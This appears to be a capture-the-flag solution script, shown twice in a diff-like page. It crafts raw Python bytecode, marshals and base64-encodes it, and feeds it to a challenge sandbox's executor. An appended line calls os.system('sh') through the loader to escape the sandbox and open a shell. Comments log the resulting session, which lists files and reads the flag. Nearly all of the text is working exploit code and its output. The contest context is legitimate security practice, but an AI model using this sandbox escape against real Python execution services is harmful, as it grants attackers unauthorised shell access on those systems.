lebr0nli · November 5, 2023 09:19
diff --git a/solve.py b/solve.py
 import base64
 import dis
 import marshal
 import subprocess

 from opcode import opmap


 def f(): pass

 code = bytes(
        [
            opmap['RESUME'], 0,
            opmap['LOAD_CONST'], 227,
            opmap['UNPACK_EX'], 29,
            opmap['BUILD_TUPLE'], 28,
            opmap['POP_TOP'], 0,
            opmap['SWAP'], 2,
            opmap['POP_TOP'], 0,
            opmap['LOAD_CONST'], 227,
            opmap['SWAP'], 2,
            opmap['BINARY_SUBSCR'], 0, 0, 0,
            opmap['COPY'], 1,
            opmap['CALL'], 0, 0, 0, 0, 0, 0, 0,
            opmap['LOAD_CONST'], 227,
            opmap['UNPACK_EX'], 21,
            opmap['BUILD_TUPLE'], 20,
            opmap['POP_TOP'], 0,
            opmap['SWAP'], 2,
            opmap['POP_TOP'], 0,
            opmap['LOAD_CONST'], 227,
            opmap['SWAP'], 2,
            opmap['BINARY_SUBSCR'], 0, 0, 0,
            opmap['SWAP'], 2,
            opmap['CALL'], 0, 0, 0, 0, 0, 0, 0,
            opmap['RETURN_VALUE'], 0,
        ]
 )
 # dis.dis(code)
 f.__code__ = f.__code__.replace(co_code=code, co_names=(), co_consts=(), co_cellvars=(), co_freevars=(), co_varnames=())
 payload = base64.b64encode(marshal.dumps(f.__code__))
 payload += b"\nloads.__self__.__loader__.load_module('os').system('sh')\n"
 print(payload.decode())
 # subprocess.run(["python3", "./executor.py"], input=payload)

 # Give me your source:
 # 4wAAAAAAAAAAAAAAAAAAAAADAAAA80AAAACXAGTjXh1mHAEAYwIBAGTjYwIZAAAAeAGrAAAAAAAAAGTjXhVmFAEAYwIBAGTjYwIZAAAAYwKrAAAAAAAAAFMAqQByAgAAAHICAAAA8wAAAAD6FS9ob21lL3VidW50dS9zb2x2ZS5wedoBZnIFAAAABwAAAPMCAAAAgQByAwAAAA==
 # loads.__self__.__loader__.load_module('os').system('sh')<built-in function input>
 # ls
 # executor.py
 # flag-9b949bf8bdf1beef0f7a9f4a7ef46c12
 # start.sh
 # cat flag*
 # TSGCTF{our_caffeine_knight_slays_python_bytes}
	import base64
	import dis
	import marshal
	import subprocess

	from opcode import opmap


	def f(): pass

	code = bytes(
	[
	opmap['RESUME'], 0,
	opmap['LOAD_CONST'], 227,
	opmap['UNPACK_EX'], 29,
	opmap['BUILD_TUPLE'], 28,
	opmap['POP_TOP'], 0,
	opmap['SWAP'], 2,
	opmap['POP_TOP'], 0,
	opmap['LOAD_CONST'], 227,
	opmap['SWAP'], 2,
	opmap['BINARY_SUBSCR'], 0, 0, 0,
	opmap['COPY'], 1,
	opmap['CALL'], 0, 0, 0, 0, 0, 0, 0,
	opmap['LOAD_CONST'], 227,
	opmap['UNPACK_EX'], 21,
	opmap['BUILD_TUPLE'], 20,
	opmap['POP_TOP'], 0,
	opmap['SWAP'], 2,
	opmap['POP_TOP'], 0,
	opmap['LOAD_CONST'], 227,
	opmap['SWAP'], 2,
	opmap['BINARY_SUBSCR'], 0, 0, 0,
	opmap['SWAP'], 2,
	opmap['CALL'], 0, 0, 0, 0, 0, 0, 0,
	opmap['RETURN_VALUE'], 0,
	]
	)
	# dis.dis(code)
	f.__code__ = f.__code__.replace(co_code=code, co_names=(), co_consts=(), co_cellvars=(), co_freevars=(), co_varnames=())
	payload = base64.b64encode(marshal.dumps(f.__code__))
	payload += b"\nloads.__self__.__loader__.load_module('os').system('sh')\n"
	print(payload.decode())
	# subprocess.run(["python3", "./executor.py"], input=payload)

	# Give me your source:
	# 4wAAAAAAAAAAAAAAAAAAAAADAAAA80AAAACXAGTjXh1mHAEAYwIBAGTjYwIZAAAAeAGrAAAAAAAAAGTjXhVmFAEAYwIBAGTjYwIZAAAAYwKrAAAAAAAAAFMAqQByAgAAAHICAAAA8wAAAAD6FS9ob21lL3VidW50dS9zb2x2ZS5wedoBZnIFAAAABwAAAPMCAAAAgQByAwAAAA==
	# loads.__self__.__loader__.load_module('os').system('sh')<built-in function input>
	# ls
	# executor.py
	# flag-9b949bf8bdf1beef0f7a9f4a7ef46c12
	# start.sh
	# cat flag*
	# TSGCTF{our_caffeine_knight_slays_python_bytes}